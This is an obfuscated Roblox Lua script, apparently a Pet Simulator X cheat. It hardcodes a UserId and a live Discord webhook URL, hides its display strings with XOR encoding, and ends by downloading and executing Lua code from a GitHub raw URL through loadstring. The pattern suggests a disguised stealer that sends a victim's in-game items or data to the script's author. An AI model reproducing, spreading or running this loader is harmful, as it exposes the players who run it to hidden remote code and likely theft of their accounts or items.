--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + ((v11-1)% #v9) ,1 + ((v11-1)% #v9) + 1 )))%256 ));end return v5(v10);end UserId=883016338 -149952218 ;WebHook="https://discord.com/api/webhooks/1089530425568935948/YDihb1ccsh5HT5zbljfeoznniPhatMtFTAHMwshR5wnNovAgQJV_kJN-ujNbjDpSYNEq";_G.CustomScriptName=v7("\24\228\201\94\226\24\63\255\216\94\176\47\63\227","\80\145\174\59\194\91");_G.Text1=v7("\154\199\172\41\72\226\58\202\149\199\163\59\68\254\41\133\164\134\227\99","\214\168\205\77\33\140\93\234");_G.Text2=v7("\209\70\142\50\73\66\10\106\224\72\149\102\115\79\31\35\246\83","\134\39\231\70\32\44\109\74");_G.Text3=v7("\192\113\206\226\235\220\200\46\163\74\200\243\233\197\210\58\173\55\133","\131\25\171\129\128\181\166\73");_G.Text4=v7("\76\231\36\195\235\118\253\34\145\204\124\225\44\193\235\49\189\107","\31\147\69\177\159");loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimxgm.lua"))();
